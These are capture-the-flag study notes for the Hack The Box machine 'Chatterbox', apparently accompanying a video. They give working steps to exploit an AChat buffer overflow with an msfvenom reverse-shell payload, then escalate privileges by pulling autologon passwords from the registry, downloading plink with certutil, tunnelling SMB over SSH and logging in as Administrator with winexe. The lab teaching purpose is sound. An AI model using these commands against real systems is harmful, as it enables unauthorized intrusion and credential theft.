Search

Chatterbox

Resources for this video:

Achat Exploit - https://www.exploit-db.com/exploits/36025

Achat Exploit (Metasploit) - https://www.rapid7.com/db/modules/exploit/windows/misc/achat_bof

GREAT RESOURCE:

Privilege Escalation - Windows · Total OSCP Guide (gitbooks.io)

  • nothing to connect to
  • no website
  • only thing is services running

searchsploit the services you don’t know: 

searchsploit achat

buffer overflow? Copy the script into a folder you know:

cp /usr/share/exploitdb/exploits/windows/remote/36025.py achat3.py

Yellow - default path

Purple - shown in searchsploit result

Brown - what I wanna copy it as

mousepad to read what it does:

mousepad achat3.py

change the msfvenom command to actually get a shell instead of opening a calculator:

msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

after:

msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.13 LPORT=443 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

run it and copy the buffer it produces to replace the one in the python script.

Update the script IP with the victim machine IP:

# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('10.10.10.74', 9256)

Run NetCat on 443 like we set up in the MSFVenom command:

nc -nvlp 443

run the script:

./achat3.py

Navigate shell to user desktop:

cd c:\users\Alfred\Desktop
type user.txt

find info to priv escalate:

systeminfo
net user

To check a user for admin priv:

net user alfred

dual homed (multiple IPs):

ipconfig

connections running:

netstat -ano
Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       664
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       352
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING       716
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING       456
  TCP    0.0.0.0:49156          0.0.0.0:0              LISTENING       1360
  TCP    0.0.0.0:49157          0.0.0.0:0              LISTENING       464

445 is running internally, and 445 is SMB

Can we get a password?

check registery for passwords (from resource):

reg query HKLM /f password /t REG_SZ /s

we get:

Welcome1!
image

Query the autologin (Winlogon):

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
image

We know that the password is for user Alfred but he isn’t really admin or anything.

Password reuse/Pass the pass/Pass spraying!!

How can we attack the internal 445 (SMB)?

Port Forward:

Download plink and start server to download from:

cd Downloads
ls | grep plink
python3 -m http.server 8080

Put Plink on the victim machine:

cd c:\users\alfred
certutil -urlcache -f http://10.10.14.13:8080/plink.exe plink.exe
dir #to make sure it copied

*DON’T FORGET THE PORT IF IT’S NOT 80

ON KALI:

sudo apt install ssh
service ssh start

EDIT SSH CONFIG TO LOGIN AS ROOT:

sudo mousepad /etc/ssh/sshd_config

Change PermitRootLogin:

#PermitRootLogin Prohibited
to
PermitRootLogin yes

Then restart:

sudo service ssh restart
sudo service ssh start

ON THE VICTIM:

plink.exe -l root -pw toor -R 445:127.0.0.1:445 10.10.14.13

FROM KALI:

*MIGHT HAVE TO KEEP HITTING ENTER UNTIL YOU GET A RETURN BECAUSE OF THE FUNKY BOXCEPTION

Check connection:

netstat -ano | grep 445
winexe -U Administrator%Welcome1! //127.0.0.1 "cmd.exe"
whoami